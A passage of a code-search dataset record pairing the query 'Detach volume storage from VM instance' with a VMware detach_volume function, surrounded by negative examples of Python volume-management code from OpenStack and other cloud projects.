self.assertIsNone(connection_info['data'])\n\n # stub out virt driver finish_migration\n def fake(*args, **kwargs):\n pass\n self.stub_out('nova.virt.fake.FakeDriver.finish_migration', fake)\n\n instance.task_state = task_states.RESIZE_MIGRATED\n instance.save()\n\n # new initialize connection\n new_connection_data = dict(orig_connection_data)\n new_iqn = 'iqn.2010-10.org.openstack:%s.2' % uuids.volume_id,\n new_connection_data['target_iqn'] = new_iqn\n\n def fake_init_conn_with_data(self, context, volume, session):\n connection_info['data'] = new_connection_data\n return connection_info\n self.stub_out('nova.volume.cinder.API.initialize_connection',\n fake_init_conn_with_data)\n\n self.compute.finish_resize(self.context,\n migration=migration,\n disk_info={}, image={}, instance=instance,\n request_spec=request_spec)\n\n # assert volume attached correctly\n disk_info = db.block_device_mapping_get_all_by_instance(\n self.context, instance['uuid'])\n self.assertEqual(len(disk_info), 1)\n for bdm in disk_info:\n self.assertEqual(bdm['connection_info'],\n jsonutils.dumps(connection_info))\n\n # stub out detach\n def fake_detach(self, context, volume_uuid):\n volume['device_path'] = None\n volume['instance_uuid'] = None\n self.stub_out('nova.volume.cinder.API.detach', fake_detach)\n\n # clean up\n self.compute.terminate_instance(self.context, instance, [])", "def update_volume_after_detach(self, info, vms):\n info[0]['AttachedToVm'] = vms\n if len(vms) == 0:\n info[0]['machine_path'] = None\n info[0]['State'] = 'available'\n info[0]['time'] = datetime.datetime.now()\n return info", "def mount(self, fstype, export, vol_name, mountpoint, instance, options):\n\n # NOTE(mdbooth): mount() may currently be called multiple times for a\n # single attachment. 
Any operation which calls\n # LibvirtDriver._hard_reboot will re-attach volumes which are probably\n # already attached, resulting in multiple mount calls.\n\n LOG.debug('_HostMountState.mount(fstype=%(fstype)s, '\n 'export=%(export)s, vol_name=%(vol_name)s, %(mountpoint)s, '\n 'options=%(options)s) generation %(gen)s',\n {'fstype': fstype, 'export': export, 'vol_name': vol_name,\n 'mountpoint': mountpoint, 'options': options,\n 'gen': self.generation}, instance=instance)\n with self._get_locked(mountpoint) as mount:\n if os.path.ismount(mountpoint):\n LOG.debug(('Mounting %(mountpoint)s generation %(gen)s, '\n 'mountpoint already mounted'),\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)\n else:\n LOG.debug('Mounting %(mountpoint)s generation %(gen)s',\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)\n\n fileutils.ensure_tree(mountpoint)\n\n try:\n nova.privsep.fs.mount(fstype, export, mountpoint, options)\n except processutils.ProcessExecutionError:\n # Check to see if mountpoint is mounted despite the error\n # eg it was already mounted\n if os.path.ismount(mountpoint):\n # We're not going to raise the exception because we're\n # in the desired state anyway. However, this is still\n # unusual so we'll log it.\n LOG.exception(\n 'Error mounting %(fstypes export %(export)s on '\n '%(mountpoint)s. Continuing because mountpount is '\n 'mounted despite this.',\n {'fstype': fstype, 'export': export,\n 'mountpoint': mountpoint}, instance=instance)\n else:\n # If the mount failed there's no reason for us to keep\n # a record of it. It will be created again if the\n # caller retries.\n\n # Delete while holding lock\n del self.mountpoints[mountpoint]\n\n raise\n\n mount.add_attachment(vol_name, instance.uuid)\n\n LOG.debug('_HostMountState.mount() for %(mountpoint)s '\n 'generation %(gen)s completed successfully',\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)", "def _create_volume(display_name='test_volume',\n display_description='this is a test volume',\n status='available',\n size=1,\n project_id=fake.PROJECT_ID,\n attach_status=fields.VolumeAttachStatus.DETACHED):\n vol = {}\n vol['host'] = 'fake_host'\n vol['size'] = size\n vol['user_id'] = fake.USER_ID\n vol['project_id'] = project_id\n vol['status'] = status\n vol['display_name'] = display_name\n vol['display_description'] = display_description\n vol['attach_status'] = attach_status\n vol['availability_zone'] = 'fake_zone'\n vol['volume_type_id'] = fake.VOLUME_TYPE_ID\n return db.volume_create(context.get_admin_context(), vol)['id']", "def mount_volume(self, kwargs):\n\n exp_params = [('dev_name', is_string),\n ('vol_name', is_string)]\n try:\n dev_name, vol_name = check_arguments(exp_params, kwargs)\n dev_name = \"/dev/%s\" % dev_name\n self.check_volume_name(vol_name)\n except Exception as ex:\n return HttpErrorResponse(\"%s\" % ex)\n\n self.logger.info(\"Mount operation starting up for volume '%s' on '%s'\"\n % (vol_name, dev_name))\n\n try:\n mount_point = join(self.VOLUME_DIR, vol_name)\n self._mount(dev_name, mount_point, True)\n except Exception as e:\n self.logger.exception(\"Failed to mount volume '%s'\" % vol_name)\n return HttpErrorResponse('Failed to mount volume: ' + e.message)\n\n self.logger.info('Mount operation completed')\n return HttpJsonResponse()", "def create_volume(self, volume):\n vg_name = self.get_volume_group_name(volume.id)\n vol_name = self.get_volume_name(volume.id)\n prov_type = self._get_is_dedup(volume.get('volume_type'))\n 
try:\n LOG.debug(\"Creating volume group with name: %(name)s, \"\n \"quota: unlimited and dedup_support: %(dedup)s\",\n {'name': vg_name, 'dedup': prov_type})\n\n vg = self.client.new(\"volume_groups\", name=vg_name, quota=0,\n is_dedup=prov_type).save()\n LOG.debug(\"Creating volume with name: %(name)s, size: %(size)s \"\n \"GB, volume_group: %(vg)s\",\n {'name': vol_name, 'size': volume.size, 'vg': vg_name})\n vol = self.client.new(\"volumes\", name=vol_name,\n size=volume.size * units.Mi,\n volume_group=vg).save()\n except Exception as ex:\n vg_rs = self.client.search(\"volume_groups\", name=vg_name)\n if vg_rs.total != 0:\n LOG.debug(\"Deleting vg: %s for failed volume in K2.\", vg_name)\n vg_rs.hits[0].delete()\n LOG.exception(\"Creation of volume %s failed.\", vol_name)\n raise KaminarioCinderDriverException(reason=ex)\n\n if self._get_is_replica(volume.volume_type) and self.replica:\n self._create_volume_replica(volume, vg, vol, self.replica.rpo)", "def test_extend_volume(self):\n ctxt = context.get_admin_context()\n extra_specs = {}\n type_ref = volume_types.create(ctxt, 'hgst-1', extra_specs)\n volume = {'id': '1', 'name': 'volume1',\n 'display_name': '',\n 'volume_type_id': type_ref['id'],\n 'size': 10,\n 'provider_id': 'volume10'}\n self.extended = {'name': '', 'size': '0',\n 'storageserver': ''}\n self.driver.extend_volume(volume, 12)\n expected = {'name': 'volume10', 'size': '2',\n 'storageserver': 'stor1:gbd0,stor2:gbd0,'}\n self.assertDictMatch(expected, self.extended)", "def add_disk_for_rhv_platform():\n platform = config.ENV_DATA.get(\"platform\").lower()\n if platform == constants.RHV_PLATFORM:\n # Importing here to avoid circular dependency\n from ocs_ci.deployment.rhv import RHVBASE\n\n rhv_base = RHVBASE()\n rhv_base.attach_disks(\n config.ENV_DATA.get(\"device_size\", defaults.DEVICE_SIZE),\n config.ENV_DATA.get(\"disk_format\", constants.RHV_DISK_FORMAT_RAW),\n config.ENV_DATA.get(\n \"disk_interface\", constants.RHV_DISK_INTERFACE_VIRTIO_SCSI\n ),\n config.ENV_DATA.get(\"sparse\"),\n config.ENV_DATA.get(\"pass_discard\"),\n )", "def add_disk(self, vm, size, disk_type='thin'):\n logger.info(f\"Adding disk to {vm.config.name}\")\n spec = vim.vm.ConfigSpec()\n controller = self.get_controller_for_adding_disk(vm)\n unit_number = self.get_unit_number(vm)\n logger.info(f\"Unit number for new disk: {unit_number}\")\n\n device_changes = []\n new_disk_kb = int(size) * GB2KB\n disk_spec = vim.vm.device.VirtualDeviceSpec()\n disk_spec.fileOperation = \"create\"\n disk_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add\n disk_spec.device = vim.vm.device.VirtualDisk()\n disk_spec.device.backing = vim.vm.device.VirtualDisk.FlatVer2BackingInfo()\n if disk_type == VM_DISK_TYPE:\n disk_spec.device.backing.thinProvisioned = True\n disk_spec.device.backing.diskMode = VM_DISK_MODE\n disk_spec.device.unitNumber = unit_number\n disk_spec.device.capacityInKB = new_disk_kb\n disk_spec.device.controllerKey = controller.key\n device_changes.append(disk_spec)\n spec.deviceChange = device_changes\n WaitForTask(vm.ReconfigVM_Task(spec=spec))\n logger.info(f\"{size}GB disk added successfully to {vm.config.name}\")", "def add_vdisk(client, resource_group_name, vm_name, controller=\"1000\",\n independence_mode=\"persistent\", size=16777216):\n from .vendored_sdks.models import VirtualDisk\n\n virtual_machine = client.get(resource_group_name, vm_name)\n disk = VirtualDisk(controller_id=controller,\n independence_mode=independence_mode,\n total_size=size)\n\n 
virtual_machine.disks.append(disk)\n return client.create_or_update(resource_group_name, vm_name, virtual_machine)", "def _attach_vifs(self, instance, network_info):\n if not network_info:\n return\n container_id = self._find_container_by_name(instance['name']).get('id')\n if not container_id:\n return\n netns_path = '/var/run/netns'\n if not os.path.exists(netns_path):\n utils.execute(\n 'mkdir', '-p', netns_path, run_as_root=True)\n nspid = self._find_container_pid(container_id)\n if not nspid:\n msg = _('Cannot find any PID under container \"{0}\"')\n raise RuntimeError(msg.format(container_id))\n netns_path = os.path.join(netns_path, container_id)\n utils.execute(\n 'ln', '-sf', '/proc/{0}/ns/net'.format(nspid),\n '/var/run/netns/{0}'.format(container_id),\n run_as_root=True)\n\n for vif in network_info:\n self.vif_driver.attach(instance, vif, container_id)", "def copy_volume_to_image(self, context, volume, image_service, image_meta):\n volume['provider_location'] = (\n self.create_export(context, volume, None)['provider_location'])\n connection_data = self.initialize_connection(volume, None)['data']\n target_connector = (\n connector.InitiatorConnector.factory(initiator.NVME,\n utils.get_root_helper()))\n\n try:\n device_info = target_connector.connect_volume(connection_data)\n except Exception:\n LOG.info('Could not connect SPDK target device')\n return\n\n connection_data['device_path'] = device_info['path']\n\n try:\n volume_utils.upload_volume(context,\n image_service,\n image_meta,\n device_info['path'],\n volume)\n finally:\n target_connector.disconnect_volume(connection_data, volume)", "def create_volume(c,i):\n return c.volumes.create(\n size = \"10\",\n display_name = \"instantserver-1\",\n display_description = \"Volume for instantserver-1\",\n imageRef = i\n )", "def detach_volume(self,\n connection_info,\n instance,\n mountpoint,\n encryption=None):\n volume_data = connection_info['data']\n azure_name = self._get_omni_name_from_instance(instance)\n azure_instance = utils.get_instance(\n self.compute_client, drv_conf.resource_group, azure_name)\n data_disks = azure_instance.storage_profile.data_disks\n name = volume_data['name']\n filtered_disks = [disk for disk in data_disks if disk.name != name]\n if len(filtered_disks) == len(data_disks):\n LOG.error(\"Volume %s was not attached to instance %s\" %\n (name, instance.uuid))\n return\n azure_instance.storage_profile.data_disks = filtered_disks\n utils.create_or_update_instance(self.compute_client,\n drv_conf.resource_group, azure_name,\n azure_instance)\n LOG.info(\"Detached volume %s from instance %s\" % (name, instance.uuid))", "def createVM(self ,disk ,name):\n return", "def test_11_migrate_vm_live_attach_disk_on_remote(self):\n \n global vm2\n global data_disk_2\n data_disk_2 = self.helper.create_custom_disk(\n self.apiclient,\n {\"diskname\":\"StorPoolDisk\" },\n zoneid=self.zone.id,\n size = 5,\n miniops = 2000,\n maxiops = 5000,\n account=self.account.name,\n domainid=self.account.domainid,\n diskofferingid=self.disk_offerings.id,\n )\n\n self.debug(\"Created volume with ID: %s\" % data_disk_2.id)\n\n self.virtual_machine_live_migration_2.attach_volume(\n self.apiclient,\n data_disk_2\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient, vm2, self.host_remote)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm2 = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_2, destinationHost)\n\n\n 
self.virtual_machine_live_migration_2.attach_volume(\n self.apiclient,\n self.volume_2\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient, vm2, self.host_remote)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm2 = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_2, destinationHost)", "def extend_volume(self, volume, new_size):\n if isinstance(new_size, dict):\n new_size = random.randint(new_size[\"min\"], new_size[\"max\"])\n\n aname = \"cinder_v%s.extend_volume\" % self.version\n with atomic.ActionTimer(self, aname):\n self._get_client().volumes.extend(volume, new_size)\n return self._wait_available_volume(volume)", "def add_file_or_directory_volume(self,\n runtime, # type: List[Text]\n volume, # type: MapperEnt\n host_outdir_tgt # type: Optional[Text]\n ):\n if not volume.resolved.startswith(\"_:\"):\n self._add_volume_binding(volume.resolved, volume.target) # this one defaults to read_only", "def attach_disk(self, instance, disk, zone):\n return self.call_api(\n '/zones/%s/instances/%s/attachDisk' % (zone, instance),\n method='POST',\n payload={\n 'autoDelete': True,\n 'deviceName': disk,\n 'source': 'projects/%s/zones/%s/disks/%s' % (\n self.project_id, zone, disk),\n },\n )", "def migrate_volume(self, ctxt, volume_id, host, force_host_copy=False):\n return", "def on_volume(self, _instance, volume):\n self._set_volume(volume)", "def _volume(self, volume):\n self._append_or_create_property(SparkProperties.SPARK_MESOS_EXECUTOR_DOCKER_VOLUMES, volume)\n return self", "def map_volume(self, initiator, volume_name):\n hostID = self.get_host_id(initiator)\n uid = self.get_uid(volume_name)\n volInfo = self.get_volume_info(uid)\n volID = volInfo.get(SVC_KEY_VDISK_ID)\n\n cmd = \"svctask mkvdiskhostmap -host %s -force %s\" % (hostID, volID)\n self._svc_command(cmd)", "def create_volume(\n self, size, volume_type, name=None, description=None,\n availability_zone=None, metadata=None, bootable=None,\n image_ref=None, snapshot_id=None, source_volid=None):\n\n resp = self.client.create_volume(\n size, volume_type, name=name, description=description,\n availability_zone=availability_zone, metadata=metadata,\n bootable=bootable, image_ref=image_ref, snapshot_id=snapshot_id,\n source_volid=source_volid)\n\n return resp", "def _create_external_volume():\n\n if not utils.use_external_resource(ctx.node.properties):\n return False\n\n volume_id = ctx.node.properties['resource_id']\n\n volume = _get_volumes_from_id(volume_id)\n if not volume:\n raise NonRecoverableError(\n 'External EBS volume was indicated, but the '\n 'volume id does not exist.')\n utils.set_external_resource_id(volume.id, ctx.instance)\n return True", "def do_create_volume(self, arg):\n args = self.parse_arguments(arg)\n if len(args) == 0:\n self.perror(\"No name given.\")\n return\n if len(args) == 1:\n self.perror(\"No path given.\")\n return\n if not os.path.isabs(args[1]):\n print(\"Path must be absolute: \" + args[1])\n return\n self.do_coroutine(self._localStorageRoutines.create_volume_routine(args[0], args[1]))", "def volume(self, volume):\n\n self._volume = volume", "def volume(self, volume):\n\n self._volume = volume", "def volume(self, volume):\n\n self._volume = volume", "def test_aws_service_api_volume_attachment_put(self):\n pass", "def fusion_api_add_existing_storage_volume(self, body, api=None, headers=None):\n return self.volume.add_existing(body=body, api=api, headers=headers)", "def swap_volume(self, old_connection_info, 
new_connection_info,\n instance, mountpoint, resize_to):", "def mount(self, mount_point):\n log.debug(\"Mounting {0} for {1}\".format(mount_point, self.fs.get_full_name()))\n for counter in range(30):\n if self.status == volume_status.ATTACHED:\n if os.path.exists(mount_point):\n # Check if the mount location is empty\n if len(os.listdir(mount_point)) != 0:\n log.warning(\"Mount point {0} already exists and is not \"\n \"empty!? ({2}) Will attempt to mount volume {1}\"\n .format(mount_point, self.volume_id,\n os.listdir(mount_point)))\n # return False\n else:\n log.debug(\"Creating mount point directory {0} for {1}\"\n .format(mount_point, self.fs.get_full_name()))\n try:\n os.mkdir(mount_point)\n except Exception, e:\n log.warning(\"Could not create {0} mount point {1}: {2}\"\n .format(self.fs.get_full_name(), mount_point, e))\n # Potentially wait for the device to actually become available in the system\n # TODO: Do something if the device is not available in the\n # given time period\n for i in range(10):\n if os.path.exists(self.device):\n log.debug(\"Device path {0} checked and it exists.\".format(\n self.device))\n break\n else:\n log.debug(\"Device path {0} does not yet exist; waiting...\".format(\n self.device))\n time.sleep(4)\n # Until the underlying issue is fixed (see FIXME below), mask this\n # even more by custom-handling the run command and thus not\n # printing the err\n cmd = '/bin/mount %s %s' % (self.device, mount_point)\n try:\n process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n _, _ = process.communicate()\n if process.returncode != 0:\n # FIXME: Assume if a file system cannot be mounted that it's because\n # there is not a file system on the device so try creating\n # one\n if run('/sbin/mkfs.xfs %s' % self.device,\n \"Failed to create a file system on device %s\" % self.device,\n \"Created a file system on device %s\" % self.device):\n if not run(\n '/bin/mount %s %s' % (self.device, mount_point),\n \"Error mounting file system %s from %s\" % (\n mount_point, self.device),\n \"Successfully mounted file system %s from %s\" %\n (mount_point, self.device)):\n log.error(\"Failed to mount device '%s' to mount point '%s'\"\n % (self.device, mount_point))\n return False\n # Resize the volume if it was created from a snapshot\n else:\n if self.snapshot and self.volume.size > self.snapshot.volume_size:\n run('/usr/sbin/xfs_growfs %s' % mount_point)\n log.info(\n \"Successfully grew file system {0}\".format(self.fs.get_full_name()))\n except Exception, e:\n log.error(\"Exception mounting {0} at {1}\".format(\n self.fs.get_full_name(), mount_point))\n return False\n try:\n # Default owner of all mounted file systems to `galaxy`\n # user\n os.chown(mount_point, pwd.getpwnam(\n \"galaxy\")[2], grp.getgrnam(\"galaxy\")[2])\n # Add Galaxy- and CloudBioLinux-required files under the\n # 'data' dir\n if ServiceRole.GALAXY_DATA in self.fs.svc_roles:\n for sd in ['files', 'tmp', 'upload_store', 'export']:\n path = os.path.join(\n self.app.path_resolver.galaxy_data, sd)\n if not os.path.exists(path):\n os.mkdir(path)\n # Make 'export' dir that's shared over NFS be\n # owned by `ubuntu` user so it's accesible\n # for use to the rest of the cluster\n if sd == 'export':\n os.chown(path, pwd.getpwnam(\n \"ubuntu\")[2], grp.getgrnam(\"ubuntu\")[2])\n else:\n os.chown(path, pwd.getpwnam(\n \"galaxy\")[2], grp.getgrnam(\"galaxy\")[2])\n except OSError, e:\n log.debug(\n \"Tried making 'galaxyData' sub-dirs but failed: %s\" % e)\n # If based on an 
archive, extract archive contents to the mount point\n if self.from_archive:\n # Do not overwrite an existing dir structure w/ the archive\n # content. This happens when a cluster is rebooted.\n if self.fs.name == 'galaxy' and \\\n os.path.exists(self.app.path_resolver.galaxy_home):\n log.debug(\"Galaxy home dir ({0}) already exists; not \"\n \"extracting the archive ({1}) so not to \"\n \"overwrite it.\".format(self.app.path_resolver.galaxy_home,\n self.from_archive['url']))\n self.fs.nfs_share_and_set_state()\n else:\n self.fs.state = service_states.CONFIGURING\n # Extract the FS archive in a separate thread\n ExtractArchive(self.from_archive['url'], mount_point,\n self.from_archive['md5_sum'],\n callback=self.fs.nfs_share_and_set_state).run()\n else:\n self.fs.nfs_share_and_set_state()\n return True\n else:\n log.warning(\"Cannot mount volume '%s' in state '%s'. Waiting \"\n \"(%s/30).\" % (self.volume_id, self.status, counter))\n time.sleep(2)", "def detach_volume(self, connection_info, instance, mountpoint,\n encryption=None):", "def __init__(__self__, *,\n mount_path: pulumi.Input[str],\n type: pulumi.Input[str],\n enable_sub_path: Optional[pulumi.Input[bool]] = None,\n mount_options: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n read_only: Optional[pulumi.Input[bool]] = None,\n share_name: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"mount_path\", mount_path)\n pulumi.set(__self__, \"type\", 'AzureFileVolume')\n if enable_sub_path is None:\n enable_sub_path = False\n if enable_sub_path is not None:\n pulumi.set(__self__, \"enable_sub_path\", enable_sub_path)\n if mount_options is not None:\n pulumi.set(__self__, \"mount_options\", mount_options)\n if read_only is not None:\n pulumi.set(__self__, \"read_only\", read_only)\n if share_name is not None:\n pulumi.set(__self__, \"share_name\", share_name)", "def add_writable_file_volume(self,\n runtime, # type: List[Text]\n volume, # type: MapperEnt\n host_outdir_tgt, # type: Optional[Text]\n tmpdir_prefix # type: Text\n ):\n if self.inplace_update:\n self._add_volume_binding(volume.resolved, volume.target, writable=True)\n else:\n if host_outdir_tgt:\n # shortcut, just copy to the output directory\n # which is already going to be mounted\n log.debug('shutil.copy({}, {})'.format(volume.resolved, host_outdir_tgt))\n shutil.copy(volume.resolved, host_outdir_tgt)\n else:\n log.debug('tempfile.mkdtemp(dir={})'.format(self.tmpdir))\n tmpdir = tempfile.mkdtemp(dir=self.tmpdir)\n file_copy = os.path.join(\n tmpdir, os.path.basename(volume.resolved))\n log.debug('shutil.copy({}, {})'.format(volume.resolved, file_copy))\n shutil.copy(volume.resolved, file_copy)\n self._add_volume_binding(file_copy, volume.target, writable=True)\n ensure_writable(host_outdir_tgt or file_copy)", "def _get_system_volume(vm_):\n\n # Override system volume size if 'disk_size' is defined in cloud profile\n disk_size = get_size(vm_)[\"disk\"]\n if \"disk_size\" in vm_:\n disk_size = vm_[\"disk_size\"]\n\n # Construct the system volume\n volume = Volume(\n name=\"{} Storage\".format(vm_[\"name\"]),\n size=disk_size,\n disk_type=get_disk_type(vm_),\n )\n\n if \"image_password\" in vm_:\n image_password = vm_[\"image_password\"]\n volume.image_password = image_password\n\n # Retrieve list of SSH public keys\n ssh_keys = get_public_keys(vm_)\n volume.ssh_keys = ssh_keys\n\n if \"image_alias\" in vm_.keys():\n volume.image_alias = vm_[\"image_alias\"]\n else:\n volume.image = get_image(vm_)[\"id\"]\n # Set volume availability zone if defined 
in the cloud profile\n if \"disk_availability_zone\" in vm_:\n volume.availability_zone = vm_[\"disk_availability_zone\"]\n\n return volume", "def extend_volume(self, volume, new_size):\n spdk_name = self._get_spdk_volume_name(volume.name)\n params = {'name': spdk_name, 'size': new_size * units.Gi}\n self._rpc_call('bdev_lvol_resize', params)", "def add_volume(self, volume_block, apfs_tree):\n\n # get volume superblock\n block = self.read_block(volume_block)\n block_map = block.body.block_map_block # mapping btree\n root_dir_id = block.body.root_dir_id # root dir id\n if self.verbose:\n vol_desc = \"%s (volume, Mapping-Btree: %d, Rootdir-ID: %d\" % (\n block.body.name, block_map, root_dir_id)\n else:\n vol_desc = block.body.name\n\n # get volume btree\n block = self.read_block(block_map)\n\n # get root btree node and parse it with all its children, collecting dir entries\n block = self.read_block(block.body.root)\n entries = self.get_entries(block)\n\n # create a tree from the found dir entries\n vol_node = Node(vol_desc, apfs_tree)\n self.list_children(1, entries, vol_node)", "def mount(self, dev, path, mount_options):\n # if directory is not a mount point, mount it\n if not os.path.ismount(path):\n # check to see if dev is LVM. If so, activate it's associated volume group\n vg = self.get_vg(dev)\n if len(vg) > 0:\n Helper._runOsCommand(\"sudo /sbin/pvscan && sudo /sbin/vgscan && sudo /sbin/lvscan && sudo /sbin/vgchange -ay %s\" % vg, self.tracer)\n # check / create mount point and mount device\n self._checkAndCreatePath(path)\n self._mount(dev, path, mount_options)\n else:\n self.tracer.info(\"device %s is already mounted to %s\" % (dev, path))", "def createLogicalVolume(self, vg, filesystem, name, mountpoint, size):\n lv = {}\n lv['command'] = 'create:logvol'\n lv['vg'] = vg\n lv['fs'] = filesystem\n lv['size'] = size - EXTENT_SIZE + 1\n lv['name'] = name\n lv['mountPoint'] = mountpoint\n lv['format'] = 'yes'\n\n return lv", "def create_volume(self, name: str, size: int) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def register_volume(Ec2VolumeId=None, StackId=None):\n pass" ]
[ "0.81846446", "0.7974021", "0.79596764", "0.7858076", "0.7515268", "0.74380124", "0.74260545", "0.7417238", "0.72209245", "0.71213835", "0.7119569", "0.7005731", "0.6974186", "0.6920998", "0.68285924", "0.68272907", "0.6788624", "0.67863244", "0.67736286", "0.6771072", "0.6723547", "0.67089164", "0.6560618", "0.65304494", "0.64819926", "0.64619076", "0.6425282", "0.6422804", "0.6414482", "0.6393748", "0.6392118", "0.6359186", "0.6301514", "0.62971157", "0.6288974", "0.62723774", "0.62687874", "0.6155545", "0.6143512", "0.61316574", "0.61313564", "0.609626", "0.6018387", "0.60137737", "0.60119", "0.59982073", "0.5924947", "0.5902315", "0.5886486", "0.5865461", "0.58586514", "0.5829731", "0.5823636", "0.58228105", "0.5819494", "0.58126", "0.5786875", "0.57865745", "0.5785748", "0.57817554", "0.577726", "0.5758262", "0.57564944", "0.57425386", "0.5739587", "0.57308507", "0.57241136", "0.57098854", "0.57045305", "0.56968254", "0.5696411", "0.5693049", "0.5686495", "0.5681572", "0.56782305", "0.5675447", "0.563833", "0.5632644", "0.5619126", "0.5610453", "0.56104374", "0.5608469", "0.5584758", "0.55806124", "0.55806124", "0.55806124", "0.55786407", "0.55580807", "0.5552819", "0.5550245", "0.5544884", "0.5544874", "0.5541121", "0.5539458", "0.55343246", "0.5515345", "0.5495205", "0.5490238", "0.5487129", "0.54865295" ]
0.7598646
4
Detach volume storage from VM instance.
def detach_volume(self, connection_info, instance, mountpoint): instance_name = instance['name'] vm_ref = vm_util.get_vm_ref_from_name(self._session, instance_name) if vm_ref is None: raise exception.InstanceNotFound(instance_id=instance_name) # Detach Volume from VM LOG.debug(_("Detach_volume: %(instance_name)s, %(mountpoint)s") % locals()) driver_type = connection_info['driver_volume_type'] if driver_type not in ['iscsi']: raise exception.VolumeDriverNotFound(driver_type=driver_type) data = connection_info['data'] # Discover iSCSI Target device_name, uuid = volume_util.find_st(self._session, data, self._cluster) if device_name is None: raise volume_util.StorageError(_("Unable to find iSCSI Target")) # Get the vmdk file name that the VM is pointing to hardware_devices = self._session._call_method(vim_util, "get_dynamic_property", vm_ref, "VirtualMachine", "config.hardware.device") device = vm_util.get_rdm_disk(hardware_devices, uuid) if device is None: raise volume_util.StorageError(_("Unable to find volume")) self.detach_disk_from_vm(vm_ref, instance_name, device) LOG.info(_("Mountpoint %(mountpoint)s detached from " "instance %(instance_name)s") % locals())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def detach_volume(self, connection_info, instance, mountpoint,\n encryption=None):", "def detach_volume(self):\n\n # Choose the volume\n volume_id = self._choose_among_used_volumes()\n\n # Cancel\n if not volume_id:\n print 'Operation cancelled'\n return\n\n # Detach the volume\n print '# Detaching volume \"%s\"!' % volume_id\n if self.compute.detach_volume(volume_id):\n print 'The volume has been detached!'\n else:\n print 'The volume could not been detached'", "def detach_volume(self, connection_info, instance, mountpoint,\n encryption=None):\n vhd_name = connection_info['data']['disk_name']\n vm = self._get_instance(instance.uuid)\n data_disks = vm.storage_profile.data_disks\n not_found = True\n for i in range(len(data_disks)):\n if vhd_name == data_disks[i].name:\n del data_disks[i]\n not_found = False\n break\n if not_found:\n LOG.info(_LI('Volume: %s was not attached to Instance!'),\n vhd_name, instance=instance)\n return\n self._create_update_instance(instance, vm)\n LOG.info(_LI(\"Detach Volume to Instance in Azure finish\"),\n instance=instance)", "def detach(self):\r\n\r\n return self.driver.detach_volume(volume=self)", "def detach_volume(self, host_path: str):\n del self.volumes[host_path]", "def detach_volume(self, instance_name, mountpoint):\n return True", "def detach_volume(self, context, volume_id):\n # TODO(vish): refactor this into a more general \"unreserve\"\n # TODO(sleepsonthefloor): Is this 'elevated' appropriate?\n # self.db.volume_detached(context.elevated(), volume_id)\n self.db.volume_admin_metadata_delete(context.elevated(), volume_id,\n 'attached_mode')", "def detach_volume(self,\n connection_info,\n instance,\n mountpoint,\n encryption=None):\n volume_data = connection_info['data']\n azure_name = self._get_omni_name_from_instance(instance)\n azure_instance = utils.get_instance(\n self.compute_client, drv_conf.resource_group, azure_name)\n data_disks = azure_instance.storage_profile.data_disks\n name = volume_data['name']\n filtered_disks = [disk for disk in data_disks if disk.name != name]\n if len(filtered_disks) == len(data_disks):\n LOG.error(\"Volume %s was not attached to instance %s\" %\n (name, instance.uuid))\n return\n azure_instance.storage_profile.data_disks = filtered_disks\n utils.create_or_update_instance(self.compute_client,\n drv_conf.resource_group, azure_name,\n azure_instance)\n LOG.info(\"Detached volume %s from instance %s\" % (name, instance.uuid))", "def detach(args, **_):\n\n volume_id = \\\n utils.get_external_resource_id_or_raise(\n 'detach volume', ctx.source.instance)\n instance_id = \\\n utils.get_external_resource_id_or_raise(\n 'detach volume', ctx.target.instance)\n\n if _detach_external_volume_or_instance():\n return\n\n ctx.logger.debug('Detaching EBS volume {0}'.format(volume_id))\n\n volume_object = _get_volumes_from_id(volume_id)\n\n if not volume_object:\n raise NonRecoverableError(\n 'EBS volume {0} not found in account.'.format(volume_id))\n\n try:\n detached = volume_object.detach(**args)\n except (boto.exception.EC2ResponseError,\n boto.exception.BotoServerError) as e:\n raise NonRecoverableError('{0}'.format(str(e)))\n\n if not detached:\n raise NonRecoverableError(\n 'Failed to detach volume {0} from instance {1}'\n .format(volume_id, instance_id))\n\n utils.unassign_runtime_property_from_resource(\n 'instance_id', ctx.source.instance)\n ctx.logger.info(\n 'Detached volume {0} from instance {1}.'\n .format(volume_id, instance_id))", "def detach(self, name):\n volume_info = self.cm.find_name(name)\n if volume_info 
and volume_info[0]['State'] != \"deleted\":\n vms = volume_info[0]['AttachedToVm']\n path = volume_info[0]['path']\n if len(vms) == 0:\n Console.error(f\"{name} is not attached to any vm\")\n else:\n removed = []\n for vm in vms:\n result = self.unmount(path=f\"{path}/{name}\", vm=vm)\n mounts = result['mounts']\n if f\"{path}/{name}\" not in mounts.keys():\n removed.append(vm)\n for vm in removed:\n vms.remove(vm)\n result = self.update_volume_after_detach(volume_info, vms)\n return result[0]\n else:\n Console.error(\"volume does not exist or volume had been deleted\")", "def _detach_volume(self, server, volume):\n try:\n volume = self.volumes_client.show_volume(volume['id'])['volume']\n # Check the status. You can only detach an in-use volume, otherwise\n # the compute API will return a 400 response.\n if volume['status'] == 'in-use':\n self.servers_client.detach_volume(server['id'], volume['id'])\n except lib_exc.NotFound:\n # Ignore 404s on detach in case the server is deleted or the volume\n # is already detached.\n pass", "def _detach_volume(self, server, volume):\n try:\n volume = self.volumes_client.show_volume(volume['id'])['volume']\n # Check the status. You can only detach an in-use volume, otherwise\n # the compute API will return a 400 response.\n if volume['status'] == 'in-use':\n self.servers_client.detach_volume(server['id'], volume['id'])\n except lib_exc.NotFound:\n # Ignore 404s on detach in case the server is deleted or the volume\n # is already detached.\n pass", "def detach_volume(self, volume: Union[dto.Volume, str]) -> dto.Volume:\n raise 